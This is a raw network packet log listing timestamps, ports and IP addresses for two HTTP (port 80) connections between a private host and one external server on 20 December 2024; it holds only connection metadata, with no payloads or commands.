Dec 20, 2024 16:33:06.562519073 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.562601089 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.564059019 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.564158916 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.565121889 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.565182924 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.631947994 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.632024050 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.632050991 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.632283926 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.635380983 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.635396957 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.635452032 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.635469913 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.635529041 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.638601065 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.638617039 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.638628960 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.638659000 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.638806105 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.639364004 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.639417887 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.641052008 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.641252995 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.641500950 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.641591072 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.643352985 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.643429995 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.645881891 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.645895958 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.645950079 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.645950079 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.646388054 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.646545887 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.648478985 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.648490906 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.648515940 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.648535013 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.650544882 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.650590897 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.651149988 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.651201010 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.654858112 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.654871941 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.656474113 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.656488895 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.656533957 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.656533957 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.659240007 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.659255981 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.659306049 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.659435034 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.662062883 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.662076950 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.662087917 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.662112951 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.662138939 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.664088964 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.664103985 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.664160967 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.665667057 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.665679932 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.665755987 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.665755987 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.667196989 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.667324066 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.720377922 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.721479893 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.842384100 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.842474937 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.842843056 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.845922947 CET	80	49875	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:06.845984936 CET	49875	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:06.963372946 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.418528080 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.418606997 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.418612003 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.418623924 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.418648005 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.418670893 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.418834925 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.418845892 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.418858051 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.418869972 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.418884993 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.418931961 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.419322014 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.419333935 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.419344902 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.419367075 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.419397116 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.538126945 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.538232088 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.538249969 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.538299084 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.542320013 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.542486906 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.542963982 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.543034077 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.610788107 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.610908031 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.611115932 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.611272097 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.613311052 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.613424063 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.613455057 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.613496065 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.621939898 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.621954918 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.622000933 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.630348921 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.630399942 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.630549908 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.630676031 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.638616085 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.638736010 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.638771057 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.638819933 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.646828890 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.646881104 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.647305965 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.647356987 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.655211926 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.655297041 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.656003952 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.656049013 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.663671017 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.663738966 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.663791895 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.672058105 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.672120094 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.672215939 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.672259092 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.680547953 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.680562973 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.680604935 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.687648058 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.687711000 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.687783003 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.687830925 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.694991112 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.695044041 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.695663929 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.695846081 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.730580091 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.730649948 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.809617043 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.809792995 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.809807062 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.809851885 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.811858892 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.811976910 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.812375069 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.812427044 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.816335917 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.816498041 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.816591978 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.820734024 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.820878029 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.820944071 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.825278997 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.825638056 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.826159000 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.826324940 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.829742908 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.829802990 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.829967022 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.830009937 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.834239960 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.834336996 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.834388971 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.838740110 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.838798046 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.838812113 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.838891029 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.843100071 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.843152046 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.843190908 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.843240023 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.847614050 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.847668886 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.847779036 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.847995996 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.852034092 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.852113008 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.852166891 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.856600046 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.856719971 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.856844902 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.857065916 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.861051083 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.861114025 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.861188889 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.861335993 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.864528894 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.864687920 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.864737034 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.864893913 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.868138075 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.868180037 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.868232012 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.871519089 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.871579885 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.871609926 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.871805906 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.874960899 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.875050068 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.875072956 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.875092030 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.878619909 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.878854990 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.878891945 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.878906012 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.882051945 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.882247925 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.882318974 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.885525942 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.885577917 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.885611057 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.885885954 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.889005899 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.889064074 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.889192104 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.889369965 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.892551899 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.892699957 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.893119097 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.893385887 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.895973921 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.896114111 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.896133900 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.896148920 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.899457932 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.899519920 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:08.899512053 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:08.899559975 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.001843929 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.001923084 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.002078056 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.002120018 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.003225088 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.003273964 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.003299952 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.003365993 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.006355047 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.006406069 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.006525993 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.006580114 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.009130001 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.009195089 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.009259939 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.011892080 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.011965036 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.012115955 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.012168884 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.014513969 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.014580011 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.014632940 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.014677048 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.017210960 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.017338037 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.017388105 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.019781113 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.019829988 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.019974947 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.020071030 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.022419930 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.022555113 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.023046970 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.023170948 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.025230885 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.025284052 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.025799990 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.025849104 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.027510881 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.027566910 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.027652979 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.027698040 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.029968977 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.030184031 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.030260086 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.030455112 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.032357931 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.032411098 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.032494068 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.032639027 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.034785986 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.034919977 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.034923077 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.034967899 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.037334919 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.037384987 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.037434101 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.039792061 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.039844990 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.040229082 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.040357113 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.042244911 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.042356014 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.042609930 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.043296099 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.044693947 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.044790983 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.044837952 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.047086954 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.047214985 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.047224045 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.047255993 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.049696922 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.049740076 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.049830914 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.049876928 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.051974058 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.052016020 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.052194118 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.052400112 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.054485083 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.054548025 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.054615974 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.054856062 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.056946039 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.057010889 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.057352066 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.057396889 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.059396982 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.059446096 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.059510946 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.059545994 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.061865091 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.061913967 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.062155008 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.062196970 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.064413071 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.064426899 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.064485073 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.064800024 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.194473028 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.194555044 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.194597006 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.194839001 CET	49881	80	192.168.2.6	185.156.73.23
